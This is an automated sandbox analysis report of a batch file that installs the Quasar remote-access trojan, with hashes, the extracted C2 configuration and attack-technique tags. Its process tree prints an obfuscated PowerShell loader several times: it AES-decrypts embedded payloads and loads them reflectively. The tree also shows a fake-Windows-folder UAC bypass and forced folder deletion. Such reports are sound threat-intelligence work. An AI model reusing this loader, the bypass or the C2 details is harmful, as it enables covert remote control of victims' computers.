Overview

overview

10

Static

static

1

67d3bd5196...86.bat

windows7-x64

3

67d3bd5196...86.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-11-2024 02:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86.bat

  • Size

    535KB

  • MD5

    b9e1a4ea5f3b3fd0b0394183365edf8b

  • SHA1

    79bec6a406682c1385ba71a62e70b5744de0fb76

  • SHA256

    67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86

  • SHA512

    132bcd79be79e2b2fb6319d25f9ae89fc8bda65c9872792181b270cd31ad43998c1a34319e9d2f66e7bf3f035428231644d3c253e6eb1ae30095b64a702cf969

  • SSDEEP

    12288:jdnWhmK+sUu8PzDo84iBk1XZq51gzyqS996PxMdGos+Rcxdj:9WhmFsJ848Zk9KyMdGL+Y5

Score
10/10
quasaroffice04defense_evasiondiscoveryexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

walkout.ddnsgeek.com:8080

Mutex

27391f85-a482-471a-b2cd-1f8ab5bde32e

Attributes
  • encryption_key

    6469F8C5BA9A2CFDCF4A3F1651D1E92DBEA41117

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

    execution
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4064
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('iZqoW2CsAJeY9D83aLEj+3rxJ2t2B3ify+RUYbhDZLc='); $aes_var.IV=[System.Convert]::FromBase64String('HqkR8+zl0nkre/D9VtHffg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$cFfgm=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$eBtZT=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$Baxky=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($cFfgm, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $Baxky.CopyTo($eBtZT); $Baxky.Dispose(); $cFfgm.Dispose(); $eBtZT.Dispose(); $eBtZT.ToArray();}function execute_function($param_var,$param2_var){ IEX '$UGiVy=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$iInyN=$UGiVy.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$iInyN.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$rrktb = 'C:\Users\Admin\AppData\Local\Temp\67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86.bat';$host.UI.RawUI.WindowTitle = $rrktb;$zVxza=[System.IO.File]::ReadAllText($rrktb).Split([Environment]::NewLine);foreach ($vxMZN in $zVxza) { if ($vxMZN.StartsWith('SkRmYQdHVSEYUqjPEfjK')) { $uwpGR=$vxMZN.Substring(20); break; }}$payloads_var=[string[]]$uwpGR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
      2⤵
        PID:3636
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        2⤵
        • Blocklisted process makes network request
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2884
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3512
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3464
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3684
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4652
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2280
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4940
          • C:\Windows \System32\ComputerDefaults.exe
            "C:\Windows \System32\ComputerDefaults.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1048
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:632
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3616
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('iZqoW2CsAJeY9D83aLEj+3rxJ2t2B3ify+RUYbhDZLc='); $aes_var.IV=[System.Convert]::FromBase64String('HqkR8+zl0nkre/D9VtHffg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$cFfgm=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$eBtZT=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$Baxky=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($cFfgm, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $Baxky.CopyTo($eBtZT); $Baxky.Dispose(); $cFfgm.Dispose(); $eBtZT.Dispose(); $eBtZT.ToArray();}function execute_function($param_var,$param2_var){ IEX '$UGiVy=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$iInyN=$UGiVy.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$iInyN.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$rrktb = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $rrktb;$zVxza=[System.IO.File]::ReadAllText($rrktb).Split([Environment]::NewLine);foreach ($vxMZN in $zVxza) { if ($vxMZN.StartsWith('SkRmYQdHVSEYUqjPEfjK')) { $uwpGR=$vxMZN.Substring(20); break; }}$payloads_var=[string[]]$uwpGR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:4448
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                  7⤵
                  • Blocklisted process makes network request
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3164
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5016
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:3500
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:3440
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:3024
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                        10⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3808
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4712
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1048 -s 1068
              5⤵
              • Program crash
              PID:4712
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4900
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1048 -ip 1048
      1⤵
        PID:4044

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
        Filesize

        1KB

        MD5

        938ffc2cba917b243d86b2cf76dcefb4

        SHA1

        234b53d91d075f16cc63c731eefdae278e2faad3

        SHA256

        5c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca

        SHA512

        e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
        Filesize

        53KB

        MD5

        3337d66209faa998d52d781d0ff2d804

        SHA1

        6594b85a70f998f79f43cdf1ca56137997534156

        SHA256

        9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd

        SHA512

        8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        19KB

        MD5

        9be396418f8f61b53dd025a7cbb90af8

        SHA1

        9a9fe3c81cea30d326d517ccb5a184255c4731e7

        SHA256

        d4b1595b904f7036e1319c156ad6fa38210750c4032ba43746976a296af277b8

        SHA512

        8a479c28b30fa64e475cf6cb976ad7909cb999407f318ff75def95d3b6e12c4ff48fcea20ad6772d150015fae1993fc63d23b235ebdce69022b80a31efd2731d

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        18KB

        MD5

        6d559c8b7e31ad465a918a899cb86ac7

        SHA1

        374c95e38eb412356e6b3ad3002717ea93062d53

        SHA256

        16e9ae96042e69fd2c5dc990b5ea891a248def0783d2b3abc76dfc71296da849

        SHA512

        61ed2b1d806b1b6e3fbb2b7d9a3ea87b66fb54a402f440861941e440b57a2af78addb20c7f1abf13277febbfa6cf47f97fe0296b0e2453d89150de79bc22b6dd

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        21KB

        MD5

        f64806504ca1964c1a1070f076540d37

        SHA1

        448e45be9d1adbed680cb075f0c043359894e04a

        SHA256

        86bbd420cb6fd81ed3e2e02c6f88b5ae2ce6943db8b3a4a81500e75efa29a2d7

        SHA512

        03b0368622224df6606036280cb7726701d96b31a520b6ee4024a7560aadcfabbd7f50fdc7d8419926094231d2f6f70a7e8498e0b13f0ef7612774a2c1502ca5

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        612B

        MD5

        1e33e0ac56fc35a18763abee679e9377

        SHA1

        4a84ab19484d9a50c5433d6efa450bfbb1ce4bbc

        SHA256

        c2b21254ad76e6c6059c98ed3a2e7fb3141c284945ac5bdac33d412ac6f67480

        SHA512

        d51dfe80ad8d801ae0828580d9795c80b3610c75dce65448c1865443ea7ce5e45369c9b8048785a6590edc37f278451b30776ead7bde5a8431564a86d5d98639

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        19KB

        MD5

        ac2a5f730dceeefb451be5bca3570e5e

        SHA1

        0bc0a646168965cc00082b2c66bcf1a55117ca72

        SHA256

        03ee4f1deb5cf4e3d325ad3eb149cec7a0dc1d76bf0dc1222c673cc22bf9de4b

        SHA512

        89eb88496c4d4332689b6f80ad722b5fd36f4235e3696d695e0cc1f9a92292432f84fb3513e84e85f963231f41841163ba37a7bb18353e67bb44bf3298f405ee

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\SC.cmd
        Filesize

        535KB

        MD5

        b9e1a4ea5f3b3fd0b0394183365edf8b

        SHA1

        79bec6a406682c1385ba71a62e70b5744de0fb76

        SHA256

        67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86

        SHA512

        132bcd79be79e2b2fb6319d25f9ae89fc8bda65c9872792181b270cd31ad43998c1a34319e9d2f66e7bf3f035428231644d3c253e6eb1ae30095b64a702cf969

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lid2mac2.3vp.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd
        Filesize

        1.6MB

        MD5

        d7239bc304b1d9d4ae192e2570419d53

        SHA1

        dccb1c1c8021d791852cd5c0dc5c6240be0ed2d1

        SHA256

        7543e6925701f6fde75accb15f483991596b55260b720ba7dbc84cc48eeb27aa

        SHA512

        d52dde51b91d287c750e85828ce4dd7a46e0ea2235fd6e63d4e7588745f7e34c198827cccb2d719525ecea5e92a8804377ca193b2d3e1e0e986d4f77d8dd4430

        Download Submit

      • C:\Windows \System32\ComputerDefaults.exe
        Filesize

        66KB

        MD5

        cfa65b13918526579371c138108a7ddb

        SHA1

        28bc560c542c405e08001f95c4ea0511e5211035

        SHA256

        4c70fea1c4f9b78955eb840c11c6c81f1d860485e090526a8e8176d98b1be3d6

        SHA512

        7ad417e862c38f1032b300735c00050435f0dd1d816e93b9a466adf3bc092be770ebf59c1617db2281c7cf982a75e6c93d927d5784132aa2c6292f3e950eca88

        Download Submit

      • C:\Windows \System32\MLANG.dll
        Filesize

        93KB

        MD5

        dc73eb0945a5e0246479de101537c9d8

        SHA1

        b4a9d97c2c6a43944a92bc6356e9be2582918da7

        SHA256

        a1f6562dab180a4c2967eab04cf6f39e3f19c99068824230b7c32891da8aba73

        SHA512

        0bf6c18bc1bf62b3025128a419091ca3a0239bcfb519007549dfa350584890ccce30115cb9c3f72e647c3d4c142cec09bba8842e6666513f3358f2557fe96f29

        Download Submit

      • memory/2884-21-0x0000000006FE0000-0x0000000007056000-memory.dmp

        Filesize

        472KB

        Download

      • memory/2884-0-0x0000000074CFE000-0x0000000074CFF000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2884-22-0x00000000076E0000-0x0000000007D5A000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/2884-23-0x0000000007080000-0x000000000709A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/2884-5-0x0000000004BE0000-0x0000000004C02000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2884-117-0x0000000007560000-0x00000000075BC000-memory.dmp

        Filesize

        368KB

        Download

      • memory/2884-118-0x0000000008D60000-0x0000000008E1C000-memory.dmp

        Filesize

        752KB

        Download

      • memory/2884-3-0x0000000074CF0000-0x00000000754A0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2884-39-0x0000000002270000-0x000000000227C000-memory.dmp

        Filesize

        48KB

        Download

      • memory/2884-40-0x0000000074CFE000-0x0000000074CFF000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2884-41-0x0000000074CF0000-0x00000000754A0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2884-42-0x00000000071E0000-0x0000000007246000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2884-43-0x0000000074CF0000-0x00000000754A0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2884-20-0x00000000060F0000-0x0000000006134000-memory.dmp

        Filesize

        272KB

        Download

      • memory/2884-19-0x0000000005D70000-0x0000000005DBC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/2884-18-0x0000000005CC0000-0x0000000005CDE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/2884-17-0x00000000057E0000-0x0000000005B34000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/2884-7-0x0000000004DF0000-0x0000000004E56000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2884-6-0x0000000004D80000-0x0000000004DE6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2884-4-0x0000000074CF0000-0x00000000754A0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2884-1-0x0000000002380000-0x00000000023B6000-memory.dmp

        Filesize

        216KB

        Download

      • memory/2884-2-0x0000000004FA0000-0x00000000055C8000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/3512-38-0x0000000074CF0000-0x00000000754A0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3512-35-0x0000000074CF0000-0x00000000754A0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3512-25-0x0000000074CF0000-0x00000000754A0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3512-24-0x0000000074CF0000-0x00000000754A0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/4652-89-0x0000000000920000-0x000000000092C000-memory.dmp

        Filesize

        48KB

        Download

      • memory/4652-94-0x0000000009E80000-0x0000000009E8A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4652-108-0x000000000A2A0000-0x000000000A352000-memory.dmp

        Filesize

        712KB

        Download

      • memory/4652-109-0x000000000DC20000-0x000000000DDE2000-memory.dmp

        Filesize

        1.8MB

        Download

      • memory/4652-110-0x000000000E410000-0x000000000EA28000-memory.dmp

        Filesize

        6.1MB

        Download

      • memory/4652-114-0x000000000EA90000-0x000000000EAA2000-memory.dmp

        Filesize

        72KB

        Download

      • memory/4652-115-0x000000000EAF0000-0x000000000EB2C000-memory.dmp

        Filesize

        240KB

        Download

      • memory/4652-107-0x000000000A190000-0x000000000A1E0000-memory.dmp

        Filesize

        320KB

        Download

      • memory/4652-93-0x0000000009F00000-0x0000000009F92000-memory.dmp

        Filesize

        584KB

        Download

      • memory/4652-90-0x00000000072B0000-0x00000000073E2000-memory.dmp

        Filesize

        1.2MB

        Download

      • memory/4652-91-0x00000000073E0000-0x0000000007704000-memory.dmp

        Filesize

        3.1MB

        Download

      • memory/4652-92-0x000000000D4A0000-0x000000000DA44000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/4712-136-0x0000000005F30000-0x0000000005F52000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4712-135-0x0000000006D00000-0x0000000006D96000-memory.dmp

        Filesize

        600KB

        Download